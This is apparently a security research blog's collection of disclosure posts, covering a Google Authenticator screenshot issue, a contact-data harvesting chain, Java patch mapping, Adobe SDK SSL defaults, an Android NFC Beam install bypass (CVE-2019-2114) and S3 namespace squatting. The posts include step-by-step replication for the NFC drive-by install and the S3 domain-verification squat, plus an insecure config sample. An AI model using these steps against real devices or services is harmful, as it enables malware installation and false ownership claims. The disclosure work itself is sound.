FLAG_SECURE and Accessibility Services (a11y)

About four years ago, we first blogged about FLAG_SECURE in Android applications and how it can be used to protect sensitive screens from being captured in screenshots. One of the reasons that prompted our original blog post is the fact that FLAG_SECURE was not intended for security of screenshots but is rather a side effect of DRM.

Since then we have reported the lack of FLAG_SECURE as an issue to multiple Android app vendors. Our most recent blog post was about the fact that Google’s 2FA application (“Google Authenticator”) lacked FLAG_SECURE. We disclosed this specific issue (“Google Authenticator”) because of recent reports of malware attacking such applications using Android’s accessibility services (a11y). Yanick Fratantonio (who had a lot more experience with these services) went through the trouble of putting together a POC, as well as writing a truly excellent blog post about how FLAG_SECURE does NOT protect against attacks using these services.

After reviewing both our research and disclosures published by others, there seem to have been an assumption going around for a while that FLAG_SECURE should protect against such attacks (a11y) but no actual data to back this up. To be clear, FLAG_SECURE should still protect against malware using the MediaProjection API to record video or take screenshots, but it DOES NOT protect against attacks using Android’s accessibility services (a11y).

We amended our earlier posts to make this distinction clear and would like to thank Yanick Fratantonio for bringing this up.

Google Authenticator for Android Allows Screen Capture

Google offers an application for Android called “Google Authenticator” which is used to setup two-factor authentication (2FA). This application is used to generate standard OTP codes usually used for 2FA.

It appears that Google Authenticator allows screenshots to be taken of OTP codes. The implication is that if a user’s device ends up running a rogue app, that app can capture all generated OTP codes as they are shown by the app, and thus break two factor authentication.

[EDITED: 2020-03-23: This is only true for rogue apps with screenshot permissions (MediaProjection) BUT not those using accessibility (a11y) permissions. This is especially true since many such rogue apps use Android accessibility to scrape screenshots from running apps. However, using FLAG_SECURE may prevent that behavior even via accessibility permissions, although more research is needed to confirm that.]

UPDATE (2020-03-03): Disclosed publicly because of recent media reports

UPDATE #2 (2020-03-04): Multiple people noted that Microsoft Authenticator has the same issue. We blogged about that back in 2018 and the issue remains unfixed.

UPDATE #3 (2020-03-23): Although FLAG_SECURE may protect against malicious apps using the MediaProjection APIs, HOWEVER, as per the comment below from Yanick Fratantonio and his blog post, FLAG_SECURE doesn’t protect against attacks using accessibility services. See our follow-up post here.

Steps to Replicate

To replicate, try the following:

  1. Open the application.
  2. Add an account.
  3. Press Power + Volume Down at any sensitive screen and observe a screenshot being taken.

The underlying reason is because the app is not using “FLAG_SECURE” for such screens (more information on FLAG_SECURE can be found in our earlier blog post). By contrast, many Android apps with higher security requirements use it.

Vendor Response

We filed a bug report with the vendor (Google) and the vendor filed an internal bug. The vendor never informed us whether the bug was fixed. Testing on the most recent version reveals that the bug is still present.

Screen Shot 2020-03-03 at 10.00.33 PM

References

  • GitHub issue filed by someone else – see here
  • Google Play link to the app – see here
  • Google Security Case # 8-2193000017345
  • Our earlier blog post about FLAG_SECURE on Android – see here
  • ZDNet report regarding Cerberus malware attacking this app – see here

Timeline

  • 2014-10-10: GitHub issue filed by someone else
  • 2017-05-10: Issue filed with the vendor, triaged and bug filed
  • 2017-05-11: Follow-up discussion regarding other vendor apps
  • 2017-05-12: Response regarding bounty received
  • 2020-02-27: Media story regarding malware targeting this app
  • 2020-03-03: Public disclosure
  • 2020-03-04: Added comment regarding Microsoft Authenticator
  • 2020-03-23: Added clarification regarding screenshot permissions and accessibility permissions

 

Another Tale of Personal Data Harvesting: Alsid, Lusha.co and Simpler Apps

After reading a recent post by Antoine Neuenschwander, we wanted to share a similar experience from one of our consultants regarding the sale and use of their personal data, featuring many of the same players as Antoine’s post.

Part 1 – The Sales Call from Alsid

One of the many scourges of modern work is the fact that salespeople try to reach you all the time. In this particular case, our consultant was called on their work phone, via email and LinkedIn by someone from a French cybersecurity company called Alsid. Then to their surprise a call from France rang on their personal, US-based, cell phone and left a voicemail. That got them curious – how did this company get a hold of a personal cell phone number? Being that the company is French it is subject to GDPR so they asked for a copy of their data held by the company. The company did provide a fairly extensive GDPR response but the cell phone number wasn’t in it! After follow-up questioning, they eventually dug it out – their salesperson got it from Lusha.co:

Screen Shot 2020-02-10 at 11.07.33 PM

There are several privacy concerns here:

  • Why was the number not provided in the initial GDPR request?
  • Did the caller check to make sure the number wasn’t a wireless phone AND wasn’t on the Do Not Call List (since it is illegal to place telemarketing calls to such numbers in the US)?

Part 2 – The B2B Contact Enrichment Tool – Lusha.co

Lusha.co provides a set of plugins that can enrich LinkedIn profiles – so if you are looking at someone’s profile, they can supplement that with the person’s phone number or email from another sources. The website, marketing materials and privacy policy are pretty explicit about this:

Screen Shot 2020-02-10 at 11.12.56 PM

And (emphasis added):

Our Services are designed to help Users and vendors (e.g. HR professionals, B2B partners, sales platforms) validate and verify contact information and to find business profiles they seek in order to interact with relevant Contacts (as defined below), through access to business profiles retained in Lusha’s database (“Lusha Database”). 

A data request sent to Lusha.co resulted in the response below. Note the language around Simpler – specifically the last paragraph. It seems that Simpler provides mobile apps to be used for “verification”, then those apps slurp up the user’s contacts and share them back with Lusha.co:

Screen Shot 2020-02-10 at 11.25.52 PM

Excerpt of the text appears below:

Simpler also offers its users the opportunity to contribute to a collaborative security effort, meant to assist in authenticating the identifying attributes of an individual. This effort can assist in establishing a trusted channel of communication for online and offline interactions.

If a Simpler user consents to contribute to this effort, basic contact information (name and phone number) found within such user’s contacts may be shared with Lusha, which implements the security solution.

If you dig deeper into the Lusha.co materials, a lot of similar language appears there as well.  Instead of a discussion of B2B contact data, it suddenly becomes a matter of “security“, “trust” and a “collaborative security effort“. When you look at their data page (emphasis added), note that the language quickly changes from “lead enrichment” or B2B data” to a “collaborative security effort”:

Lusha’s core purpose is to make online engagement safe and efficient. In today’s fast-paced and multi-layered world, one of the main challenges to online users is trust. A major risk in online interactions is the risk of encountering fraud, whether by phishing attempts or by identity theft. Widespread fraud can lead to the loss of customer trust, extra costs of time and money required to manage fraud incidents, damages to the reputation of individuals and institutions, possible legal costs and many more negative outcomes.

Lusha’s unique solution is based on a collaborative security effort, effectively utilizing information to verify online identities. The Lusha service provides its users with valuable insights and assists in authenticating the identity of individuals in the online sphere.

There are several privacy concerns here:

  • Why is a tool that claims to provide B2B information obfuscated behind being “a security solution”?
  • How can “security” and “trust” justify essentially taking users’ address books from their mobile devices and selling that data for marketing?

Part 3 – The Mobile Address Books from Simpler

The link provided by Lusha actually leads to the Google Play Store. This leads to two apps – Simpler Caller ID and Dialer, both apps with more than 5 million installations each. The link on the store listings leads to the company’s website where third app is listed – EasyBackup, a contacts backup manager (only for iOS). That one is owned by a different company called “Top Floor” which also makes an app called “Cleaner Pro” (for iOS) which claims to remove duplicate contacts. Mailing addresses for both companies go to co-working spaces: one in Brooklyn, NY and the other in Los Angeles, CA.

Here are the apps:

The Simpler Apps website still lists all of these apps as being theirs:

Screen Shot 2020-02-11 at 11.08.27 PM

A request was sent to Simpler for copy of the data they collected, and the following response was received – no data. A follow-up response was sent and a response is still pending:

Screen Shot 2020-02-11 at 11.01.27 PM

At this point we are at a dead end with Simpler, but further research reveals the following nuggets buried in the terms of use and privacy policy:

By using our Services, you acknowledge and agree that we will share contact information with other users our affiliates and business partners for the purpose of ensuring that their current contact information is up to date. You acknowledge that you have the rights and permissions required to allow us to share such contact information.

And:

We do not share your Personal Information with third parties except:

  • The Services are based on contact management and Caller ID (if applicable), therefore, we will use your number and contact for this purpose. This disclosure is also important to individuals that are not our users which may be identified by the caller ID. We enable an easy opt-out in the event you no longer wish to be identified, for more information see the User Right section below.

  • We may also share Personal Information with (i) our subsidiaries and business partners if needed; (ii) subcontractors and other third party service providers (e.g. payment processors, server, cloud management, etc.); and (iii) any potential purchasers or investors of the Company.

There are several privacy concerns here:

  • Why is a tool that claims to provide tools for making sure contact information is correct, selling data for marketing?
  • What is the connection between Simpler and Lusha.co?

Part 4 – Tying It All Together: Lusha.co and Simpler

At this point, it is fairly clear what happened – a bunch of mobile apps slurp app contacts from their users’ address books and provide it to Lusha.co to be used by marketers and recruiters. This is being presented as a “collaborative security solution” while it is essentially just selling personal data, albeit with an opt-out available. What is frustrating about this, is that regular users who are friends with the people being targeted are installing these apps, thinking it is just a simple utility while all of their contacts are actually being sold behind their back. At the same time, Lusha.co is claiming to be a security solution while they are clearly not.

data_flow

But, there is more … a set of simple Google searches shows that one of the co-founders of Lusha.co (“Yoni Tserruya”) is actually the original app developer for all four of these apps (here, here, here and here). Furthermore, if you download the Android apps provided by Simpler and look at the signing keys via jadx, they are issued to the same person as seen below:

Screen Shot 2020-02-11 at 7.40.10 AMScreen Shot 2020-02-11 at 7.40.25 AM

Now these apps are being published by companies other than Lusha.co – Simpler Apps and Top Floor, but are they subsidiaries or related to Lusha.co? If they are, then the privacy policies seem to allow them to transfer data from these apps back to Lusha.co. Overall, the arrangement may be legal but perhaps unethical.

Bottom line: this example highlights yet another way personal data is harvested, sold and re-used for commercial purposes.

Vendor Responses

We reached out for comment to all of the companies mentioned in the article and will update the blog post with feedback or comments.

Mapping the Jan 2020 Java Security Patches Back to the Original Source Code Changes

(UPDATE [01/16/2020]: Added clarification as to the source of the information for the source commits)

Earlier today Oracle releases patches for various flavors of Java. At the same time, the open source version of Java – OpenJDK – released their patches as well. The problem is that it is virtually impossible to figure out what the actual bugs are. Here are partial screenshots from Oracle’s critical patch update advisory, text version and the OpenJDK advisory:

Screen Shot 2020-01-15 at 10.38.47 PM Screen Shot 2020-01-15 at 10.40.43 PM Screen Shot 2020-01-15 at 10.41.46 PM

The actual CVE descriptions are also cryptic – here is an example of one (CVE-2020-2583):

Vulnerability in the Java SE, Java SE Embedded product of Oracle Java SE (component: Serialization). Supported versions that are affected are Java SE: 7u241, 8u231, 11.0.5 and 13.0.1; Java SE Embedded: 8u231. Difficult to exploit vulnerability allows unauthenticated attacker with network access via multiple protocols to compromise Java SE, Java SE Embedded. Successful attacks of this vulnerability can result in unauthorized ability to cause a partial denial of service (partial DOS) of Java SE, Java SE Embedded.

Note: This vulnerability applies to Java deployments, typically in clients running sandboxed Java Web Start applications or sandboxed Java applets (in Java SE 8), that load and run untrusted code (e.g., code that comes from the internet) and rely on the Java sandbox for security. This vulnerability can also be exploited by using APIs in the specified Component, e.g., through a web service which supplies data to the APIs.

CVSS v3.0 Base Score 3.7 (Availability impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:L). 

The problem is that not enough information is being provided in order to make an educated decision, especially in cases where there are limited resources for patching. How do we figure out what the vulnerability actually is?

It is possible to derive the source code changes from the Debian package updates OpenJDK release notes that map the CVEs to the actual source code changesets in the OpenJDK repository (HG and GitHub). For example as seen below, “CVE-2020-2583” links to the source code changes # 8224909:

Screen Shot 2020-01-15 at 11.33.13 PM

Looking at the HG repository for OpenJDK and the GitHub mirror it is pretty easy to figure out:

Screen Shot 2020-01-15 at 11.32.20 PM

Screen Shot 2020-01-15 at 11.31.47 PM

And the actual changes can now be examined in detail:

Screen Shot 2020-01-15 at 11.34.46 PM Screen Shot 2020-01-15 at 11.34.31 PM

Based on those sources, we can now reconstruct the actual bugs and their source code changes for JDK 11 (Debian mesage here based on the OpenJDK release notes here):

CVE ID Component CVSSv3 Commit Description
CVE-2020-2604 core-libs/
java.io:serialization
7.1 8231422 (HG / GitHub) Better serial filter handling
CVE-2020-2601 security-libs/
java.security
6.8 8229951 (HG / GitHub) Better Ticket Granting Services
CVE-2020-2655 security-libs/
javax.net.ssl
4.8 8231780 (HG / GitHub) Better TLS messaging support
CVE-2020-2593 core-libs/
java.net
4.8 8228548 (HG / GitHub) Normalize normalization for all
CVE-2020-2654 security-libs/
java.security
3.7 8234037 (HG / GitHub) Improve Object Identifier Processing
CVE-2020-2590 security-libs/
org.ietf.jgss
3.7 8226352 (HG / GitHub) Improve Kerberos interop capabilities
CVE-2020-2583 client-libs/
java.beans
3.7 8224909 (HG / GitHub) Unlink Set of LinkedHashSets

Additionally for CVE-2020-2604, the Oracle release notes include this (JDK bug # corresponds to the commit # above:

Screen Shot 2020-01-15 at 11.57.13 PM

Credits

Written by Y. Shafranovich

Behavior Change in Chrome’s Download Protection Service Affecting Privacy

The Download Protection service in Chrome protects users from downloading malware/viruses by blocking files that are known to be unsafe by the Google’s Safe Browsing service. The way this works is that Chrome sends some basic information about the file being downloaded including the checksum to the Safe Browsing service and receives a verdict.

Historically, not all file types were checked – instead a list of extensions to be checked or ignored is defined in the Chrome source code and only those extensions would be checked. Any extensions not on the list are ignored. These lists can be found in the following file (“download_file_types.asciipb”).

Apparently, this has been changed recently. As per information provided from a recent bug report (https://crbug.com/1039128), Chrome now checks ALL extensions except for the ones on the whitelist. That means when you download almost any file, the checksum and some other information about the file are sent back to Google. It is not clear how this impacts privacy.

You can disable this behavior by disabling the Safe Browsing API entirely but that will also disable checks for malicious URLs. As of now, there doesn’t seem to be an option to disable download protection separately from safe browsing for URLs.

You can see this information by visiting the following URL:

Example of a MRC file being downloaded from the Internet Archive:

Screen Shot 2020-01-12 at 10.30.18 AM

Credits

Written by Y. Shafranovich.

Insecure Defaults in Adobe’s Mobile SDKs

Summary

Example/default configuration files provided by Adobe within their mobile SDKs include several insecure options. These have also been found in the wild in multiple mobile applications. When these options are used insecurely, attackers can view or modify information transmitted by the application back to Adobe’s cloud services.

Application developers are encouraged to check the configuration files within their own applications to make sure these options are set correctly. The vendor has updated some of these files with secure alternatives – for others, new SDKs are available with secure defaults.

We also have a tool available (“truegaze“) that can be used for static scanning of mobile applications with insecure defaults in their Adobe configurations.

Details

Adobe provides multiple mobile SDKs intended for integration into mobile applications across multiple platforms. These SDKs communicate between the mobile apps and the vendor-provided cloud services. Some of the example/default configuration files include insecure settings. This can lead to applications copying these insecure settings into their own applications and we have observed this behavior in the wild. We are also working on automated tools to detect these files with insecure settings within mobile applications.

The main configuration file for these SDKs is called “ADBMobileConfig.json” and is usually packaged within the application file. There are several insecure settings included within this file which may lead to sensitive data being transmitted without SSL and can be seen or modified by an attacker with access to the network traffic. These include:

  • analytics -> ssl – Enables (true) or disables (false) the ability to send measurement data by using SSL (HTTPS). Default is false. This is the one most commonly found and should be changed to “true” by default.
  • mediaHeartbeat -> ssl – enables (true) or disables (false) the ability to send hearbeat data by using SSL (HTTPS). Default is false.

There are also additional settings which can be incorrectly set not to use SSL, but are not usually presented that way by default:

  • postback -> templateurl – configuration for the postback URL which are used to send data collected by the SDK to a third party server
  • remotes – defines the Adobe-hosted endpoints for dynamic configuration files including:
    • analytics.poi – endpoint for hosted POI configuration.
    • messages – endpoint for hosted in-app message configuration

This can also be configured via code as follows:

  • C/C++/Objective C – hbConfig.ssl = NO;
  • JS – MediaHeartbeatConfig.ssl = false

Here is an abbreviated example file with the insecure settings highlighted:

{
  "analytics": {
    ...
    "ssl": false,
    ...
  },
  "messages": [
    {
      ...
      "payload": {
        "templateurl": "http://example.com/subscriptions/{%mcid%}",
        ...
      },
      ...
    },
  ],
  "remotes": { 
        "analytics.poi": "http://assets.adobedtm.com/staging/42a6fc9b77cd9f29082cf19b787bae75b7d1f9ca/scripts/satellite-53e0faadc2f9ed92bc00003b.json", 
        "messages": "http://assets.adobedtm.com/staging/42a6fc9b77cd9f29082cf19b787bae75b7d1f9ca/scripts/satellite-53e0f9e2c2f9ed92bc000032.json" 
    }
 }

Examples

The following examples/docs were reported to the vendor and were updated to have secure defaults:

The following have insecure defaults and are present within vendor-provided code, documentation or code samples. The vendor will not be fixing them:

Vendor Response and Mitigation

Application developers utilizing the Adobe SDK within their applications should check the configuration for the SDK to make sure all of the options are set securely.

The vendor provided the following response:

Thanks for reaching out to Adobe.  The configuration file you identified is an empty “sample” file, and we’re working with the owner to update that config to use SSL by default.  In practice, Adobe customers will either:

1. Download a file from Mobile Services (where SSL is on by default)
2. Engage Adobe professional services to create a configuration file (wherein SSL is recommended) or,  
3. Customers will create their own configuration (where the vast majority enable SSL)

Additionally, we’ve released a new version of the SDK (https://github.com/Adobe-Marketing-Cloud/acp-sdks), configurable in Launch, where SSL is always turned on by default. 

The vendor also fixed most of these issues and provided the following response regarding the remaining unfixed issues:

Adobe has announced end-of-support for these vulnerable SDKs and encourages customers to move to our new version of the SDK where SSL is the default:

https://aep-sdks.gitbook.io/docs/version-4-sdk-end-of-support-faq

Static Scanning Tools

We have developed an open source tool that can be used for static scanning of mobile applications with insecure defaults in their Adobe configurations. You can find it here:

https://github.com/nightwatchcybersecurity/truegaze

References

Adobe tracker # PSIRT-9709
Vendor documentation: see here

Credits

Advisory written by Y. Shafranovich.

Timeline

2019-03-04: Initial report to the vendor
2019-05-06: Followup communication with the vendor
2019-07-28: Draft blog post sent to the vendor for review
2019-08-01: Follow-up communication with the vendor
2019-08-09: Follow-up communication with the vendor
2019-10-08: Follow-up communication with the vendor
2019-10-29: Follow-up communication with the vendor
2019-10-30: Ok to publish received from the vendor
2019-11-06: Public disclosure

Media Coverage

NFC Beaming Bypasses Security Controls in Android [CVE-2019-2114]

Summary

NFC beaming of applications between devices using Android OS bypasses some security controls (the “install unknown application” prompt). A rogue device like a payment terminal can use this vulnerability to infect devices with malware.

Affected versions of Android are version 8 (Oreo) and higher. The vendor assigned CVE-2019-2114 to track this issue and released a fix in the October 2019 security bulletin. Users are encouraged to update their devices to mitigate this vulnerability.

Background

Android is an open source operating system developed by Google for mobile phones and tablets. It is estimated that over two billion devices exist worldwide running Android. Most Android devices are restricted in which applications can be installed by users – in particular, they must originate from the Google Play Store. Prior to version 8 (Oreo) a system-wide setting existed in the OS which allowed users to override this control and grant them ability to install applications from any source (“Settings” -> “Security”). In Android 8 (Oreo) this has been changed, and users must grant permission to each application that is trying to perform such install as opposed to a system-wide setting. See example:

Some Android devices support NFC (Near Field Communication) – set of protocols that allow devices to communicate within a very short distance. This is used for applications like contactless payments, pairing of devices and access control. Android devices also support NFC for transferring data between two devices including contracts, photos and applications via a feature called Android Beam.

Vulnerability Details

In Android 8 (Oreo) a new feature was introduced that requires users to opt-in to the “Install unknown apps” permission on a app by app basis. However, it appears that any system application that is signed by Google will be automatically whitelisted and would not prompt the user for this permission. On a standard Android OS device, the NFC service is one such system application that has the permission to install other applications. This means, that an Android phone that has NFC and Android Beam enabled, then touching a malicious phone or a malicious NFC payment terminal to the device may allow malware to be installed by bypassing the “install unknown apps” prompt.

To see these permissions, use any Android phone with NFC and running v8 or higher, go to “Settings”, search for “Install unknown apps” to find the permission. Tap through to view apps, and make sure to select “Show system” in the dropdown menu. You will see that the “NFC Service” is listed as being allowed to install applications by default (since it is a system application). See example:

image

Steps to Replicate

To actually replicate a malicious drive-by install, do the following:

  1. Setup two phones with NFC and Android beam enabled.
  2. Download any APK file on the “sender” phone (something like
    this APK from GitHub).
  3. Go to the file manager in the “sender” phone, tap the file and select “Share”. Then select “Android Beam” as the sharing method,
  4. Bring two phones together and complete the transfer.
  5. After this is done, go to the receiver phone, tap the “Beam completed” notification, and tap the file. It will skip directly to the install prompt, bypassing the “Install unknown apps” check.

Tested on Android 9 and Android 8.10.

Vendor Response and Mitigation

The vendor (Google) classified this issue as High and assigned CVE-2019-2114 to track this issue. A fix was released in the October 2019 security bulletin. Users are encouraged to update their devices to mitigate this vulnerability. After applying the update, users are encouraged to check the “Install unknown apps” permission in settings to make sure the NFC Service is listed as “not allowed” to install applications.

This issue only affects Android version 8 (Oreo) or higher.

References

Android bulletin: October 2019 (2019-10-06)
CVE ID: CVE-2019-2114
Google Bug # 123651515 (Android ID # A-123700348)
Google Blog: Blog post about the changes in the “install unknown apps” permission

Bounty Information

This issue satisfied the requirements of the Android Security Rewards Program and a bounty payment has been paid by the vendor.

Credits

This advisory was written by Y. Shafranovich.

Timeline

2019-01-30: Initial report submitted to the vendor
2019-01-31: Vendor response received – issue under investigation
2019-02-01: Issue rated as High by the vendor
2019-03-02: Checking bug status, vendor communication
2019-04-06: Checking bug status, vendor communication
2019-04-29: Checking bug status, fix is still being worked on
2019-06-29: Checking bug status, vendor communication
2019-07-01: Vendor indicating that a patch is forthcoming, CVE assigned
2019-07-08: Notified vendor about upcoming talk
2019-07-10: Vendor informing that the fix has been delayed by a month
2019-07-28: Draft blog post sent to the vendor for review
2019-07-31: Blog post comments received from the vendor
2019-09-04: Follow-up communication with the vendor
2019-10-07: Fix released
2019-10-24: Public disclosure

Media Coverage

See:

Fixes for CVE-2018-9581 and CVE-2018-9489 in Android 10

Two privacy issues with broadcasts in Android OS are expected to be fixed in Android Q / 10 which will be released in early September of 2019. You can see the details in Google’s security bulletin available here. Some of these fixes were not available for earlier version of Android.

We originally discovered these in the Spring of 2018 and they were disclosed via a talk at BSides DE late last year. Details are available as follows:

 

 

Path-Style Model for AWS S3 Can Lead to Namespace Squatting

Summary

Path-style model for AWS S3 and other services supporting S3 APIs can lead to namespace squatting. An attacker can create a bucket that shares the name with a special filename like “robots.txt” or “crossdomain.xml”, and insert their own content via filenames placed in that bucket. Services that rely on filename verification of domain ownership and are not precise about checking the content of such files, may end up verifying the ownership of the parent domain incorrectly. We have not yet been able to confirm this via testing.

AWS will be deprecating this functionality as of September 30th, 2020.

Details

Amazon Web Services (AWS) provides a storage service called Simple Storage Service (S3) which allows users to storage data as files located inside separate locations called buckets (see docs). S3 currently supports two different addressing models: path-style and virtual-hosted style. The path-style looks like this:

https://s3.amazonaws.com/bucket/file

The virtual-hosted style looks like this:

https://bucket.s3.amazonaws.com/file

It is possible to name a bucket using a reserved name like “robots.txt”, “sitemap.xml” or “crossdomain.xml” and have that being available via the path-style addressing. HOWEVER, the only thing that would get returned is an XML-type directory listing. An attacker can add additional files into that bucket to try to influence the directory listing, but most parsers would disregard the entire file since it is malformed. What may end up happening is that the user will essentially squat this namespace.

It is not possible to reserve anything in the “.well-known” directory since it starts with a period and bucket names must start with a lowercase letter or a number. This it would not be possible to get an SSL certificate issued this way.

Additionally, if a third party service like Google WebMaster tools, Bing, etc. uses a domain validation approach to verify ownership by placing a file in the root directory, it may be possible to claim the “s3.amazonaws.com” domain as follows:

1. Create a bucket matching the verification name of the file.
2. Add the verification content as a key in that bucket.
3. Make the bucket public.

When the verification service hits the URL for “s3.amazonaws.com/verification.html” they will hit the bucket listing that was created. If the service disregards the XML and uses the value it finds, it may end up registering the service domain in the user’s account.

In our testing we have not yet found a service like that – most services will not parse an XML file that the directory listing produces.

Vendor Response and Mitigation

The vendor provided the following response:

We do not believe the behavior you describe in this report presents a security concern, given what you have outlined is theoretical.

Additionally, AWS has announced that the path-style addressing model will be deprecated as of September 30th, 2020 (see here and here).

Credits

Text written by Y. Shafranovich.

Timeline

2019-02-03: Initial report to the vendor
2019-02-06: Followup communication with the vendor
2019-02-12: Followup communication with the vendor
2019-02-18: Followup communication with the vendor
2019-02-19: Followup communication with the vendor
2019-05-03: Followup communication with the vendor
2019-07-28: Draft blog post sent to the vendor for review
2019-08-14: Public disclosure